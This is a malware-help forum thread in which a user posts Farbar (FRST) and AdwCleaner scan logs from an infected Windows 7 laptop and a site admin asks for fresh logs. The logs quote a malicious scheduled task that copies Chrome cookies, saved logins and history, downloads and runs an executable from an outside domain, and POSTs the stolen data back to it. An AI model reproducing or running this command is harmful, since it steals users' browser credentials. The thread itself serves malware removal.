Deleted Preinstalled.CyberLinkLabelPrint Folder C:\Program Files (x86)\CYBERLINK\LABELPRINT
Deleted Preinstalled.CyberLinkLabelPrint Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|UpdateLBPShortCut
Deleted Preinstalled.CyberLinkLabelPrint Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}
Deleted Preinstalled.CyberLinkLabelPrint Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{C59C179C-668D-49A9-B6EA-0121CCFC1243}
Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Shared Tools\MSConfig\startupreg\CLMLServer
Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|UpdateP2GoShortCut
Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}
Deleted Preinstalled.LenovoPower2Go Registry HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{40BF1E83-20EB-11D8-97C5-0009C5020658}


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [5170 octets] - [26/10/2021 17:59:00]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

Rudy
Site Admin
Posts: 118199
Joined: 30 Oct 2003 13:42
Location: Plzeň

Re: invalid certificates in browsers

#5 Post by Rudy »

OK. Post new FRST + Addition logs.

Eddydye
Visitor
Posts: 16
Joined: 27 May 2021 16:55

Re: invalid certificates in browsers

#6 Post by Eddydye »

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-10-2021
Ran by PC (administrator) on PC-PC (ASUSTeK Computer Inc. K50IJ) (26-10-2021 19:54:24)
Running from C:\Users\PC\Desktop
Loaded Profiles: PC
Platform: Microsoft Windows 7 Home Premium (X64) Language: Čeština (Česká republika)
Default browser: IE
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe
() [File not signed] C:\Program Files\ATKGFNEX\GFNEXSrv.exe
() [File not signed] C:\ProgramData\SoundFlowPicker\SoundFlowPicker.exe
(AlcorMicro Co., Ltd.) [File not signed] C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe
(ASUS) [File not signed] C:\Program Files (x86)\ASUS\ATK Media\DMedia.exe
(ASUSTeK Computer Inc. -> ) C:\Program Files (x86)\ASUS\ATK Hotkey\Atouch64.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ASUS CopyProtect\ASPG.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\AsLdrSrv.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\ATKOSD.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\HControl.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\HControlUser.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\KBFiltr.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATK Hotkey\WDC.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\ATKOSD2\ATKOSD2.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\SmartLogon\sensorsrv.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Program Files (x86)\ASUS\SmartLogon\smartlogon.exe
(ASUSTeK Computer Inc. -> ASUS) C:\Windows\AsScrPro.exe
(ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Windows\System32\FBAgent.exe
(ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.) C:\Windows\SysWOW64\Fast Boot\FastBootAgent.exe
(ASUSTeK Computer Inc. -> ATK) C:\Program Files\P4G\BatteryLife.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronic Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.112\GoogleCrashHandler64.exe
(Google LLC -> Google LLC) C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\GoogleCrashHandler64.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Windows -> Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\BM\TMBMSRV.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\SfCtlCom.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\TmProxy.exe
(Trend Micro, Inc. -> Trend Micro Inc.) C:\Program Files\Trend Micro\Internet Security\UfSeAgnt.exe
(VIA) [File not signed] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDECK.EXE

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [UfSeAgnt.exe] => C:\Program Files\Trend Micro\Internet Security\UfSeAgnt.exe [1022368 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [320000 2009-04-09] (AlcorMicro Co., Ltd.) [File not signed]
HKLM\...\Run: [ETDWare] => C:\Program Files\Elantech\ETDCtrl.exe [619392 2009-06-12] (ELAN Microelectronics Corporation -> ELAN Microelectronic Corp.)
HKLM-x32\...\Run: [HDAudDeck] => C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe [2244096 2009-07-13] (VIA) [File not signed]
HKLM-x32\...\Run: [HControlUser] => C:\Program Files (x86)\ASUS\ATK Hotkey\HControlUser.exe [105016 2009-06-19] (ASUSTeK Computer Inc. -> ASUS)
HKLM-x32\...\Run: [ATKOSD2] => C:\Program Files (x86)\ASUS\ATKOSD2\ATKOSD2.exe [8493624 2009-07-07] (ASUSTeK Computer Inc. -> ASUS)
HKLM-x32\...\Run: [ATKMEDIA] => C:\Program Files (x86)\ASUS\ATK Media\DMedia.exe [159744 2009-04-20] (ASUS) [File not signed]
HKLM-x32\...\Run: [Setwallpaper] => c:\programdata\SetWallpaper.cmd
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-1878501408-2484808434-785971923-1000\...\Run: [Google Update] => C:\Users\PC\AppData\Local\Google\Update\1.3.36.112\GoogleUpdateCore.exe [223816 2021-10-11] (Google LLC -> Google LLC)
HKLM\...\Windows x64\Print Processors\Canon MP250 series Print Processor: C:\Windows\System32\spool\prtprocs\x64\CNMPD9W.DLL [28672 2010-04-24] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\...\Print\Monitors\Canon BJ Language Monitor MP250 series: C:\Windows\system32\CNMLM9W.DLL [336896 2010-04-24] (Microsoft Windows Hardware Compatibility Publisher -> CANON INC.)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\95.0.4638.54\Installer\chrmstp.exe [2021-10-25] (Google LLC -> Google LLC) [File not signed]
HKLM\Software\...\Authentication\Credential Providers: [{06FE45A8-6D92-44ba-A0F1-9A9BCDC8F5A7}] -> C:\Program Files (x86)\ASUS\SmartLogon\system\FaceCredentialProvider64.dll [2009-05-01] (ASUS) [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\FancyStart daemon.lnk [2009-10-06]
ShortcutTarget: FancyStart daemon.lnk -> C:\Windows\Installer\{60D6618B-153F-4353-8185-908E676E5888}\_DCE9A4DB2A5F2786140FA3.exe () [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\tmchlang.lnk [2009-10-06]
ShortcutTarget: tmchlang.lnk -> C:\Program Files\Trend Micro\Internet Security\TmChLang.exe (Trend Micro, Inc. -> Trend Micro Inc.)
HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {2C093763-EE42-49CF-8891-F189A4AB542C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {326F35B1-9030-43D1-BD0D-5DBD49CECAFF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)
Task: {3BA45A0D-24F6-4688-84BE-D1EA203FDFE0} - System32\Tasks\WC3 => C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe [1593344 2009-07-24] () [File not signed]
Task: {4CDF81D0-F7E2-48C8-817A-A530B90DD8DF} - System32\Tasks\Microsoft Windows Defender Update => C:\Program Files (x86)\Rezhabeck\mp3RenamerPro\mp3RenamerPro.exe
Task: {6E64456A-0201-4D80-BB77-5184B428C4FA} - System32\Tasks\Check Volumes => C:\Windows\SYSTEM32\CMD.EXE /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Local State" "C:\Users\PC\AppData\Local\Temp\OEROW4YA69" > NUL && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" http://1oivviovidwopopin.info/f2/OSJPN1IXJW.exe -s -k -o "C:\Users\PC\AppData\Local\Temp\OSJPN1IXJW.exe" && cd C:\Users\PC\AppData\Local\Temp\ && "OSJPN1IXJW.exe" V04J2WGO4Hf2 DYY04N8UKN 1Q541DFWIX OEROW4YA69 & copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\History" "C:\Users\PC\AppData\Local\Temp\J1O2156BEB" > NUL && cd C:\Users\PC\AppData\Local\Temp\ && "C:\Users\PC\AppData\Local\Temp\OR0HXXB6JC.exe" -X POST -H "Content-type: application/octet-stream" --data @J1O2156BEB http://1oivviovidwopopin.info/h -> /C copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Cookies" "C:\Users\PC\AppData\Local\Temp\DYY04N8UKN" > NUL && copy /Y /B "C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\PC\AppData\Local\Temp\1Q541DFWIX" > NUL && copy /Y /B "C:\Users\PC\AppDa (the data entry has 678 more characters). <==== ATTENTION
Task: {74344F07-42C6-4622-9312-152A6B0AECFF} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA => C:\Users\PC\AppData\Local\Google\Update\GoogleUpdate.exe [154440 2021-02-16] (Google LLC -> Google LLC)
Task: {7A61CC45-675A-42D9-BC0A-D3691F5842ED} - System32\Tasks\ASUS SmartLogon Console Sensor => C:\Program Files (x86)\ASUS\SmartLogon\sensorsrv.exe [305720 2009-05-19] (ASUSTeK Computer Inc. -> ASUS)
Task: {CA21A731-91AF-4714-8E6F-CFE619DD08A0} - System32\Tasks\Games\UpdateCheck_S-1-5-21-1878501408-2484808434-785971923-1000 => {CA22F5B1-E06F-4A2B-94FC-21E87FE53781} C:\Windows\System32\gameux.dll [2746368 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
Task: {E24D73D5-BC2A-4F11-90B0-83E312366154} - System32\Tasks\ASUS P4G => C:\Program Files\P4G\BatteryLife.exe [267832 2009-07-29] (ASUSTeK Computer Inc. -> ATK)
Task: {F53D1F2C-4DBF-4EB4-9E7F-45350BE21FBF} - System32\Tasks\ASPG => C:\Program Files (x86)\ASUS\ASUS CopyProtect\aspg.exe [163384 2009-06-29] (ASUSTeK Computer Inc. -> ASUS)
Task: {FF6375C1-1AC9-466C-80D7-F1443D3F6986} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156232 2021-10-25] (Google LLC -> Google LLC)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 78.157.167.7 78.157.167.57
Tcpip\..\Interfaces\{6FBAB886-4307-4726-B9CB-F48F3A217E2B}: [DhcpNameServer] 78.157.167.7 78.157.167.57

FireFox:
========
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll [No File]
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.3 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll [2008-11-13] (Microsoft Corporation -> Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8051.1204 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2008-12-04] (Microsoft Corporation -> Microsoft Corporation)

Chrome:
=======
CHR Profile: C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default [2021-10-26]
CHR Notifications: Default -> hxxps//tadesco.org
CHR Extension: (Prezentace) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2021-01-03]
CHR Extension: (Dokumenty) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2021-01-03]
CHR Extension: (Disk Google) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-01-03]
CHR Extension: (YouTube) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2021-01-03]
CHR Extension: (Tabulky) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2021-01-03]
CHR Extension: (Dokumenty Google offline) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-10-25]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Gmail) - C:\Users\PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-01-03]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ATKGFNEXSrv; C:\Program Files\ATKGFNEX\GFNEXSrv.exe [94208 2007-08-08] () [File not signed]
R2 FastBootAgent; C:\Windows\SysWOW64\Fast Boot\FastBootAgent.exe [306232 2009-07-24] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
S3 GoogleChromeElevationService; C:\Program Files\Google\Chrome\Application\95.0.4638.54\elevation_service.exe [1480024 2021-10-16] (Google LLC -> Google LLC) [File not signed]
R2 SfCtlCom; C:\Program Files\Trend Micro\Internet Security\SfCtlCom.exe [838528 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R2 SoundFlowPicker; C:\ProgramData\SoundFlowPicker\SoundFlowPicker.exe [1064960 2021-07-05] () [File not signed] <==== ATTENTION
R3 TMBMServer; C:\Program Files\Trend Micro\BM\TMBMSRV.exe [570632 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 TmProxy; C:\Program Files\Trend Micro\Internet Security\TmProxy.exe [917768 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ASMMAP64; C:\Program Files\ATKGFNEX\ASMMAP64.sys [14904 2007-07-24] (ASUSTeK Computer Inc. -> )
R3 athr; C:\Windows\System32\DRIVERS\athrx.sys [1394688 2009-06-20] (Microsoft Windows -> Atheros Communications, Inc.)
R3 ETD; C:\Windows\System32\DRIVERS\ETD.sys [112128 2009-06-12] (Microsoft Windows Hardware Compatibility Publisher -> ELAN Microelectronic Corp.)
R3 kbfiltr; C:\Windows\System32\DRIVERS\kbfiltr.sys [15416 2009-07-20] (ASUSTeK Computer Inc. -> )
R3 L1E; C:\Windows\System32\DRIVERS\L1E62x64.sys [55296 2009-06-09] (Microsoft Windows Hardware Compatibility Publisher -> Atheros Communications, Inc.)
R0 lullaby; C:\Windows\System32\DRIVERS\lullaby.sys [15928 2009-06-18] (ASUSTeK Computer Inc. -> Windows (R) Win 7 DDK provider)
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1806400 2009-06-05] (SONIX TECHNOLOGY CO. , LTD -> )
R3 tmpreflt; C:\Windows\System32\DRIVERS\tmpreflt.sys [42000 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R1 tmtdi; C:\Windows\System32\DRIVERS\tmtdi.sys [107536 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 tmxpflt; C:\Windows\System32\DRIVERS\tmxpflt.sys [258064 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
R3 vsapint; C:\Windows\System32\DRIVERS\vsapint.sys [1883152 2009-08-22] (Trend Micro, Inc. -> Trend Micro Inc.)
U3 tmlwf; no ImagePath
U3 tmwfp; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-26 17:58 - 2021-10-26 18:00 - 000000000 ____D C:\AdwCleaner
2021-10-26 17:57 - 2021-10-26 17:57 - 008553680 _____ (Malwarebytes) C:\Users\PC\Desktop\AdwCleaner.exe
2021-10-26 16:52 - 2021-10-26 17:02 - 000028575 _____ C:\Users\PC\Desktop\Addition.txt
2021-10-26 16:47 - 2021-10-26 19:55 - 000015741 _____ C:\Users\PC\Desktop\FRST.txt
2021-10-26 16:47 - 2021-10-26 19:54 - 000000000 ____D C:\FRST
2021-10-26 16:42 - 2021-10-26 16:42 - 002310656 _____ (Farbar) C:\Users\PC\Desktop\FRST64.exe
2021-10-25 16:56 - 2021-10-25 16:56 - 000002244 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-10-25 16:56 - 2021-10-25 16:56 - 000002203 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-10-25 16:55 - 2021-10-25 16:55 - 000003388 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2021-10-25 16:55 - 2021-10-25 16:55 - 000003260 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2021-10-11 16:33 - 2021-10-11 16:33 - 001341272 _____ (Google LLC) C:\Users\PC\Downloads\ChromeSetup.exe

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-10-26 19:57 - 2021-08-05 15:40 - 000000824 _____ C:\Windows\system32\Drivers\etc\tmvsthfud.bin
2021-10-26 19:57 - 2021-08-05 15:40 - 000000824 _____ C:\Windows\system32\Drivers\etc\tmvsthfss.bin
2021-10-26 19:57 - 2021-07-13 16:04 - 000000004 _____ C:\ProgramData\rc.dat
2021-10-26 19:12 - 2021-07-13 16:03 - 000000004 _____ C:\ProgramData\lock.dat
2021-10-26 19:03 - 2009-07-14 06:45 - 000010016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2021-10-26 19:03 - 2009-07-14 06:45 - 000010016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2021-10-26 19:00 - 2021-01-03 19:43 - 000000000 ____D C:\Program Files (x86)\Google
2021-10-26 18:57 - 2021-07-13 16:03 - 000000060 _____ C:\ProgramData\lir.bats
2021-10-26 18:55 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2021-10-26 18:00 - 2009-10-06 11:32 - 000000000 ____D C:\Program Files (x86)\ASUS
2021-10-26 18:00 - 2009-10-06 11:16 - 000000000 ____D C:\Program Files (x86)\CyberLink
2021-10-26 17:51 - 2021-02-16 16:18 - 000002403 _____ C:\Users\PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-10-26 17:51 - 2021-02-16 16:18 - 000002366 _____ C:\Users\PC\Desktop\Google Chrome.lnk
2021-10-26 16:38 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\system32\NDF
2021-10-25 17:06 - 2009-10-06 11:35 - 000001145 _____ C:\Windows\system32\ServiceFilter.ini
2021-10-11 16:05 - 2021-02-16 16:16 - 000003558 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000UA
2021-10-11 16:05 - 2021-02-16 16:16 - 000003286 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-1878501408-2484808434-785971923-1000Core

==================== Files in the root of some directories ========

2021-07-13 16:03 - 2021-10-26 19:12 - 000000004 _____ () C:\ProgramData\lock.dat
2021-07-13 16:04 - 2021-10-26 19:57 - 000000004 _____ () C:\ProgramData\rc.dat
2021-07-13 16:03 - 2021-07-13 16:03 - 000000008 _____ () C:\ProgramData\ts.dat
2007-06-12 18:34 - 2007-06-12 18:34 - 000035822 _____ () C:\Program Files (x86)\Common Files\ASPG_icon.ico
2008-05-22 17:35 - 2008-05-22 17:35 - 000051962 _____ () C:\Program Files (x86)\Common Files\banner.jpg
2009-04-08 19:31 - 2009-04-08 19:31 - 000106496 _____ () C:\Program Files (x86)\Common Files\CPInstallAction.dll
2008-08-12 06:45 - 2008-08-12 06:45 - 000155648 _____ (ASUS) C:\Program Files (x86)\Common Files\MSIactionall.dll

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2021-03-31 16:37
==================== End of FRST.txt ========================


Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-10-2021
Ran by PC (26-10-2021 19:58:06)
Running from C:\Users\PC\Desktop
Microsoft Windows 7 Home Premium (X64) (2021-01-03 17:28:21)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================


(If an entry is included in the fixlist, it will be removed.)

Administrator (S-1-5-21-1878501408-2484808434-785971923-500 - Administrator - Disabled)
Guest (S-1-5-21-1878501408-2484808434-785971923-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1878501408-2484808434-785971923-1002 - Limited - Enabled)
PC (S-1-5-21-1878501408-2484808434-785971923-1000 - Administrator - Enabled) => C:\Users\PC

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Trend Micro Internet Security (Enabled - Up to date) {48929DFC-7A52-A34F-8351-C4DBEDBD9C50}
AS: Trend Micro Internet Security (Enabled - Up to date) {F3F37C18-5C68-ACC1-B9E1-FFA9963AD6ED}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Activation Assistant for the 2007 Microsoft Office suites (HKLM-x32\...\Activation Assistant for the 2007 Microsoft Office suites) (Version: - Microsoft Corporation)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 10 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 10.0.32.18 - Adobe Systems Incorporated)
Adobe Flash Player 10 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 10.0.32.18 - Adobe Systems Incorporated)
Adobe Reader 9.1 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader (HKLM-x32\...\InstallShield_{5A22D889-FBDD-4AE8-86EC-089D45FC133E}) (Version: 1.2.17.25001 - Alcor Micro Corp.)
Asistent pro přihlášení ke službě Windows Live (HKLM-x32\...\{1E779810-ACCA-4483-BC76-12DFE055B452}) (Version: 5.000.817.1 - Microsoft Corporation)
ASUS AI Recovery (HKLM-x32\...\{06585B02-F20D-4AB2-9A64-86EF2AE0F8F0}) (Version: 1.0.6 - ASUS)
ASUS CopyProtect (HKLM-x32\...\{6B77A7F6-DD63-4F13-A6FF-83137A5AC354}) (Version: 1.0.0015 - ASUS)
ASUS FancyStart (HKLM-x32\...\{60D6618B-153F-4353-8185-908E676E5888}) (Version: 1.0.5 - ASUSTeK Computer Inc.)
ASUS LifeFrame3 (HKLM-x32\...\{1DBD1F12-ED93-49C0-A7CC-56CBDE488158}) (Version: 3.0.20 - ASUS)
ASUS Live Update (HKLM-x32\...\{E657B243-9AD4-4ECC-BE81-4CCF8D667FD0}) (Version: 2.5.9 - ASUS)
ASUS MultiFrame (HKLM-x32\...\{9D48531D-2135-49FC-BC29-ACCDA5396A76}) (Version: 1.0.0019 - ASUS)
ASUS Power4Gear Hybrid (HKLM\...\{1686C4D1-B1FD-42E8-B7A8-FB4C4DBA5BA8}) (Version: 1.1.19 - ASUS)
ASUS SmartLogon (HKLM-x32\...\{64452561-169F-4A36-A2FF-B5E118EC65F5}) (Version: 1.0.0007 - ASUS)
Asus_Camera_ScreenSaver (HKLM-x32\...\Asus_Camera_ScreenSaver) (Version: 2.0.0009 - ASUS)
Atheros Communications Inc.(R) AR8121/AR8113/AR8114 Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.16 - Atheros Communications Inc.)
ATK Generic Function Service (HKLM-x32\...\{D3D54F3E-C5C3-443D-978F-87A72E5616E8}) (Version: 1.00.0008 - ATK)
ATK Hotkey (HKLM-x32\...\{7C05592D-424B-46CB-B505-E0013E8E75C9}) (Version: 1.0.0051 - ASUS)
ATK Media (HKLM-x32\...\{D1E5870E-E3E5-4475-98A6-ADD614524ADF}) (Version: 2.0.0005 - ASUS)
ATKOSD2 (HKLM-x32\...\{3B05F2FB-745B-4012-ADF2-439F36B2E70B}) (Version: 7.0.0005 - ASUS)
Canon MP250 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MP250_series) (Version: - Canon Inc.)
ETDWare PS/2-x64 7.0.5.5_WHQL (HKLM\...\Elantech) (Version: - )
Fast Boot (HKLM\...\{13F4A7F3-EABC-4261-AF6B-1317777F0755}) (Version: 1.0.3 - ASUS)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 95.0.4638.54 - Google LLC)
Google Chrome (HKU\S-1-5-21-1878501408-2484808434-785971923-1000\...\Google Chrome) (Version: 95.0.4638.54 - Google LLC)
Choice Guard (HKLM-x32\...\{8FFC5648-FAF8-43A3-BC8F-42BA1E275C4E}) (Version: 1.2.87.0 - Microsoft Corporation) Hidden
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: - Intel Corporation)
Junk Mail filter update (HKLM-x32\...\{4AB8B41B-3AF1-46BE-99B0-0ACD3B300C0A}) (Version: 14.0.8050.1202 - Microsoft Corporation) Hidden
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office Live Add-in 1.3 (HKLM-x32\...\{57F0ED40-8F11-41AA-B926-4A66D0D1A9CC}) (Version: 2.0.2313.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
